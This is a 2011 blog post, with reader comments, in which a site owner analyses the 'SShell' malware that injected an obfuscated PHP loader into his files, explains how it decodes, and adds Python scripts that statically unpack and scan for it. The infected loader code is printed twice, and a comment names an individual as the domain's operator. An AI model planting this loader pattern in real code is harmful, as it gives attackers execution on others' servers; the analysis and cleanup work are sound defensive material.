Malware Alert - September 2011 - SShell v.1.0


I was very unfortunate to discover today that someone had broken into my hosting account. It happened within the last few days, but went unnoticed until today.


All of my PHP files were infected with the following piece of code:


<?php
$md5 = "f8037bfb868e6c652d88c420b78404cd";
$wp_salt = array("(","i","4","o","e",'f','v','l',"$",'z',"r",'6','t',"c","g","n",')','b','s',"d",";",'_','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[4].$wp_salt[6].$wp_salt[22].$wp_salt[7].$wp_salt[0].$wp_salt[14].$wp_salt[9].$wp_salt[1].$wp_salt[15].$wp_salt[5].$wp_salt[7].$wp_salt[22].$wp_salt[12].$wp_salt[4].$wp_salt[0].$wp_salt[17].$wp_salt[22].$wp_salt[18].$wp_salt[4].$wp_salt[11].$wp_salt[2].$wp_salt[21].$wp_salt[19].$wp_salt[4].$wp_salt[13].$wp_salt[3].$wp_salt[19].$wp_salt[4].$wp_salt[0].$wp_salt[8].$wp_salt[6].$wp_salt[16].$wp_salt[16].$wp_salt[16].$wp_salt[20]);
$wp_add_filter('FZhHsoXIkkSX8+sbA+Cira0HaK01kza01prV96sdZGaEux/P8kqHf+qvnaohPcp/snQvcfT/ijKfi/Kf/...');
?>

I was really upset. Doing a search on Google for similar complaints, I found this report at Stack Overflow: [LINK]


A guy over there linked to an article at PHP-Beginners.com for more details: [LINK]


The guys at PHP Beginners were kind enough to share a cleaner script that removes the malicious code from your PHP files, and although it did a great job, that wasn't enough for me. I was really, really upset that the security of my hosting account had been compromised, so I decided to dig deeper into the problem. Examining my error logs and all the raw access logs associated with my hosting account, I discovered a number of suspicious files in the "wp-content" folder of my WordPress installation and in the "cgi-bin" folder of an old video sharing website I developed last year, which is no longer active.


I downloaded those and started to reverse engineer the whole thing, making extensive use of two great tools: PHP Decoder and PHP Formatter.


It's worth mentioning that I ended up using these two because I figured out that the whole:


<?php
$wp_salt = array("(","i","4","o","e",'f','v','l',"$",'z',"r",'6','t',"c","g","n",')','b','s',"d",";",'_','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[4].$wp_salt[6].$wp_salt[22].$wp_salt[7].$wp_salt[0].$wp_salt[14].$wp_salt[9].$wp_salt[1].$wp_salt[15].$wp_salt[5].$wp_salt[7].$wp_salt[22].$wp_salt[12].$wp_salt[4].$wp_salt[0].$wp_salt[17].$wp_salt[22].$wp_salt[18].$wp_salt[4].$wp_salt[11].$wp_salt[2].$wp_salt[21].$wp_salt[19].$wp_salt[4].$wp_salt[13].$wp_salt[3].$wp_salt[19].$wp_salt[4].$wp_salt[0].$wp_salt[8].$wp_salt[6].$wp_salt[16].$wp_salt[16].$wp_salt[16].$wp_salt[20]);
$wp_add_filter('FZhHsoXIkkSX8+sbA+Cira0HaK01kza01prV96sdZGaEux/P8kqHf+qvnaohPcp/snQvcfT/ijKfi/Kf/...');
?>

...thing is not encryption at all, but a string-building obfuscation. The $wp_salt array holds one character per slot, and the long chain of $wp_salt[n] lookups simply spells out eval(gzinflate(base64_decode($v))); which create_function() turns into an anonymous function. Calling that function with the long base64 string is therefore exactly eval(gzinflate(base64_decode('SOME_BASE64_ENCODED_STRING'))); and because the decoded stage is itself wrapped in the same way, the layers have to be peeled off one by one. Here is the entire decoded piece of malicious code that's inserted into each PHP file on your server: [LINK]
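As an added example (not the post's own tooling, and not the PHP Decoder or PHP Formatter it mentions), here is a Python script that does that decoding statically: it resolves the $wp_salt[n] chain into the string create_function() receives, then peels the nested eval(gzinflate(base64_decode(...))) layers without ever executing anything. Since the post truncates the real base64 payload, the sample below re-packs a constructed stand-in payload with the same loader lines; the inner stage text is an assumption, not the real stage-2 code.

```python
import base64
import re
import zlib

# The obfuscation layer the post shows: a one-character-per-slot array and a
# chain of $wp_salt[n] lookups that spells out the body of an anonymous function.
SALT_ARRAY_RE = re.compile(r'\$wp_salt\s*=\s*array\((.*?)\);', re.S)
SALT_ELEMENT_RE = re.compile(r'''["'](.)["']''')
CREATE_FUNCTION_RE = re.compile(r'create_function\([^,]*,(.*?)\);', re.S)
SALT_INDEX_RE = re.compile(r'\$wp_salt\[(\d+)\]')
PAYLOAD_CALL_RE = re.compile(r'''\$wp_add_filter\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)''')
# Once one layer is inflated, the next loader is usually written out in the clear.
LAYERED_EVAL_RE = re.compile(
    r'''eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)\s*\)\s*\)''',
    re.S)


def recover_function_body(src):
    """Resolve the $wp_salt[n] chain into the string create_function() receives."""
    salt = SALT_ELEMENT_RE.findall(SALT_ARRAY_RE.search(src).group(1))
    chain = CREATE_FUNCTION_RE.search(src).group(1)
    return ''.join(salt[int(i)] for i in SALT_INDEX_RE.findall(chain))


def gzinflate(data):
    """PHP's gzinflate() is raw DEFLATE (no zlib header), hence wbits=-15."""
    return zlib.decompress(data, -15)


def unpack_layers(src, max_layers=16):
    """Statically peel eval(gzinflate(base64_decode(...))) layers, never executing any.
    Returns the decoded stages in order; the last one is the real payload."""
    b64 = PAYLOAD_CALL_RE.search(src).group(1)
    stages = []
    for _ in range(max_layers):
        stage = gzinflate(base64.b64decode(b64)).decode('latin-1')
        stages.append(stage)
        nxt = LAYERED_EVAL_RE.search(stage)
        if not nxt:
            break
        b64 = nxt.group(1)
    return stages


# --- constructed sample so the script runs offline -------------------------
def pack_layer(php_src):
    """Inverse of gzinflate+base64: what the attacker's packer does to each stage."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(php_src.encode()) + c.flush()).decode()


# Assumption: a stand-in for the real stage-2 code, which the post only links to.
INNER_STAGE = "<?php /* constructed stand-in for the real stage-2 code */ echo 'payload'; ?>"
PAYLOAD = pack_layer("eval(gzinflate(base64_decode('" + pack_layer(INNER_STAGE) + "')));")

# The loader lines as the post shows them, with the truncated payload replaced
# by the constructed one above.
SAMPLE = r'''<?php
$md5 = "f8037bfb868e6c652d88c420b78404cd";
$wp_salt = array("(","i","4","o","e",'f','v','l',"$",'z',"r",'6','t',"c","g","n",')','b','s',"d",";",'_','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[4].$wp_salt[6].$wp_salt[22].$wp_salt[7].$wp_salt[0].$wp_salt[14].$wp_salt[9].$wp_salt[1].$wp_salt[15].$wp_salt[5].$wp_salt[7].$wp_salt[22].$wp_salt[12].$wp_salt[4].$wp_salt[0].$wp_salt[17].$wp_salt[22].$wp_salt[18].$wp_salt[4].$wp_salt[11].$wp_salt[2].$wp_salt[21].$wp_salt[19].$wp_salt[4].$wp_salt[13].$wp_salt[3].$wp_salt[19].$wp_salt[4].$wp_salt[0].$wp_salt[8].$wp_salt[6].$wp_salt[16].$wp_salt[16].$wp_salt[16].$wp_salt[20]);
$wp_add_filter('__PAYLOAD__');
?>'''.replace('__PAYLOAD__', PAYLOAD)

if __name__ == '__main__':
    print(recover_function_body(SAMPLE))
    for n, stage in enumerate(unpack_layers(SAMPLE), 1):
        print(f'--- stage {n} ---\n{stage}')
```

The point of doing this statically is that nothing from the infected file is ever evaluated: a decoder that calls eval() on each layer (as some one-liner "decoders" do) runs the attacker's code on your own machine.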


So the malicious code injected into my PHP files was using PHP's output buffering to rewrite the output of my scripts, appending a handful of spam links to every page they generated. (By the way, I keep a list of all the links, if anyone is interested in acquiring it.) This code also referred to one of the files placed in the "cgi-bin" folder of that old video sharing website, so I immediately started decoding all my findings, and here's what I got: [LINK]


To my dismay, it turned out that the malware can do much more harm than injecting links. One of the files in the "cgi-bin" folder is a web shell, a PHP script that gives the attackers full access to the account. It lets them browse your files, get at your databases and FTP credentials, execute arbitrary PHP code and pretty much do anything they want...


The "wp-content" folder contained almost the same files as the "cgi-bin" folder, plus an additional file called "wp-thumb-creator.php". I was terrified when I saw its decoded code [LINK], as this is the file that did all the injecting. It seems to have some connection with ydmns1.com, which is hosted somewhere in Germany, so either Germans are behind the attack or a machine in Germany has been compromised and is being used by the attackers...


Anyway, the whole thing calls itself !SShell v. 1.0 shadow edition!, so please spread the word about it and help other people protect themselves from it. Although the cleaner script that the PHP-Beginners.com guys supplied does a great job, you won't stop this from happening again unless you find and delete the SShell file and the "wp-thumb-creator.php" file that injects the malicious code into all of your PHP files, and close whatever hole they came in through. You may also want to add the following line to your php.ini as a preventive measure, so that even if you get infected again the loader fails instead of serving the spam links:


disable_functions = create_function,gzinflate,eval,base64_decode


Two caveats on that line: eval is a language construct, not a function, so listing it in disable_functions has no effect (the Suhosin extension can block it); and WordPress core itself calls create_function, gzinflate and base64_decode, so test the site after disabling them. Disabling create_function alone is enough to break this particular loader, since everything hangs off that one call; on PHP 8 and later the function no longer exists at all.
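The cleaner script the post links to strips the loader but, as the post says, leaves the dropper and the shell in place. As an added example (my own code, not the PHP-Beginners.com cleaner and not anything from the post), here is a Python scanner that does both halves of the job: it flags files carrying the loader signature, files carrying an unobfuscated eval(gzinflate(base64_decode( stage, and any .php file sitting in a directory that should only hold assets, which is where the post found wp-thumb-creator.php. It quarantines a copy of each infected file outside the web root before rewriting it. The sample tree, the shortened loader and the stand-in dropper contents are constructed for the demo; the list of asset directories is an assumption to tune for your own layout.

```python
import re
import shutil
import tempfile
from pathlib import Path

# Loader block the post shows at the top of every infected file: an optional
# $md5 line, a $wp_salt character array, a create_function() assembled from it
# and one call carrying the base64 payload. Whitespace varies, so match loosely.
INJECTED_BLOCK_RE = re.compile(
    r'<\?php\s*(?:\$md5\s*=\s*"[0-9a-f]{32}";\s*)?'
    r'\$wp_salt\s*=\s*array\(.*?\);\s*'
    r'\$wp_add_filter\s*=\s*create_function\(.*?\);\s*'
    r'\$wp_add_filter\(\s*[\'"][A-Za-z0-9+/=]+[\'"]\s*\);\s*\?>\s*',
    re.S)
# The decoded stages and many other droppers carry this loader in the clear.
LAYERED_EVAL_RE = re.compile(r'eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(', re.I)
# Assumption: directories that should never contain executable PHP.
NO_PHP_DIRS = {'img', 'images', 'uploads', 'cgi-bin'}


def classify(path, src):
    """Return the findings for one PHP file (an empty list means nothing seen)."""
    findings = []
    if INJECTED_BLOCK_RE.search(src):
        findings.append('injected-loader')
    if LAYERED_EVAL_RE.search(src):
        findings.append('layered-eval')
    if NO_PHP_DIRS & {p.name for p in path.parents}:
        findings.append('php-in-asset-dir')
    return findings


def scan_tree(root):
    """Walk root and report every .php file with at least one finding."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob('*.php')):
        # Read only; the file is never included or executed.
        findings = classify(path, path.read_text(encoding='latin-1'))
        if findings:
            report[path.relative_to(root).as_posix()] = findings
    return report


def clean_source(src):
    """Strip the injected loader block(s); returns (cleaned source, blocks removed)."""
    return INJECTED_BLOCK_RE.subn('', src)


def clean_file(path, quarantine):
    """Copy the original into quarantine (outside the web root, so the infected
    copy is never served as index.php.bak), then rewrite the file without the loader."""
    path, quarantine = Path(path), Path(quarantine)
    cleaned, n = clean_source(path.read_text(encoding='latin-1'))
    if n:
        quarantine.mkdir(parents=True, exist_ok=True)
        shutil.copy2(path, quarantine / (path.name + '.infected'))
        path.write_text(cleaned, encoding='latin-1')
    return n


# --- constructed samples, same shape as the post's loader but shortened ---------
LOADER = (
    '<?php\n'
    '$md5 = "0123456789abcdef0123456789abcdef";\n'
    '$wp_salt = array("e","v","a","l","(",")",";");\n'
    "$wp_add_filter = create_function('$'.'v',$wp_salt[0].$wp_salt[1].$wp_salt[2]"
    ".$wp_salt[3].$wp_salt[4].$wp_salt[5].$wp_salt[6]);\n"
    "$wp_add_filter('Q09OU1RSVUNURUQ=');\n"
    '?>\n')
CLEAN_TAIL = "<?php\n// legitimate application code\necho 'hello';\n"
# Assumption: stand-in for the dropper, whose real contents the post only links to.
DROPPER = "<?php eval(gzinflate(base64_decode('Q09OU1RSVUNURUQ='))); ?>\n"


def demo():
    """Build a throwaway tree, scan it, clean it and return what happened."""
    root, quarantine = Path(tempfile.mkdtemp()), Path(tempfile.mkdtemp())
    (root / 'index.php').write_text(LOADER + CLEAN_TAIL)
    (root / 'clean.php').write_text(CLEAN_TAIL)
    dropper = root / 'wp-content' / 'x' / 'img' / 'wp-thumb-creator.php'
    dropper.parent.mkdir(parents=True)
    dropper.write_text(DROPPER)
    before = scan_tree(root)
    removed = sum(clean_file(p, quarantine) for p in root.rglob('*.php'))
    return {'before': before, 'removed': removed, 'after': scan_tree(root),
            'index_restored': (root / 'index.php').read_text() == CLEAN_TAIL}


if __name__ == '__main__':
    for k, v in demo().items():
        print(k, v)
```

Note what the cleaner leaves behind: after cleaning, index.php is back to its original contents, but the dropper under img/ is still reported, because stripping the loader from infected files does nothing about the file that put it there. That file, and the shell, have to be removed by hand, and the access logs checked for how they arrived.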


It looks like the mass attacks with this malware started this month (September 2011), as I see a growing number of people complaining about it. It looks like !SShell v. 1.0 shadow edition! is actually a modified version of the Russian c99madshell script, full info on which can be found here: [LINK]

Comments

Marin wrote (3 years ago)

In that case, investigate any of your PHP files that perform write operations like fwrite() or file_put_contents().

Also, check your directory permissions. Depending on your server environment, you may want to limit public permissions on certain folders, for example using 755 on folders that are currently 775 or 777.

Hope that helps...

Amit Suneja wrote (3 years ago)

Hi Marin! We're not using WordPress... our sites are core PHP, no frameworks!

Marin wrote (3 years ago)

Hello Amit, check the link that Rich provided a few comments below. It explains that you should update the version of your Timthumb plugin.

Amit Suneja wrote (3 years ago)

Hi.. interesting reading here. This has recently infected our core PHP files. I got the functions disabled, but how do I check where the vulnerability lies? I really need to stop this from happening!
thanks.

Marin wrote (3 years ago)

Great to hear that Rich! I've enabled your link, so people arriving at this article can see it.

Rich wrote (3 years ago)

For many users, the original vulnerability seems to be related to timthumb.php. Here's a fix:
http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

Chico wrote (3 years ago)

Hi!
I'm actually interested by your proposal of sending all the links generated by this script that you collected.
Could you, please ?

Marin wrote (3 years ago)

Hmmm, you're actually right. It looks like the only way to disable it is using suhosin. The problem though is that WordPress still uses create_function, gzinflate and eval in many of its core files, so if you disable them that may break something in your blog...

Mickey wrote (3 years ago)

disable_functions = create_function,gzinflate,eval,base64_decode

In the above, I don't think listing 'eval' will do anything as 'eval' is a language construct not a function.

http://php.net/manual/en/function.eval.php

Marin wrote (3 years ago)

Well, the wp-thumb-creator.php file, which Paolo from PHP-Beginners and I think is the main virus file, was located in my "wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/" folder, so this may be a tinyMCE exploit, but I'm not 100% sure. tinyMCE exploits affecting WordPress have been reported before: [LINK] and I see that recently people on the WordPress forums started complaining about this malware attack too: [LINK]

graeme wrote (3 years ago)

Good call with the disable_function. Any other thoughts on what caused this or how to prevent it? I believe it is a wordpress flaw but not sure if there is a patch?

Marin wrote (3 years ago)

Some more info on the topic. The domain collecting the info ydmns1.com is registered at:
RUSTELEKOM LLC
Website: http://rustelekom.biz
Rustelekom have been known for a long while as a company providing shelter to hackers and spammers as reported here: [LINK]
The domain ydmns1.com itself is operated by a guy from Moscow called Vladislav Nosenko. Full info can be found here: [LINK] (that's a whois on one of his older domains)

Nino Paolo wrote (3 years ago)

Wow! Awesome! Great job Marin :) Thanks for sharing this information, this is really helpful. We now have an idea what it is. I didn't know it would be that harmful; at first, I thought it was just spam links. Thanks again. - Paolo

Marin wrote (3 years ago)

Actually the hackers seem to be of Russian origin...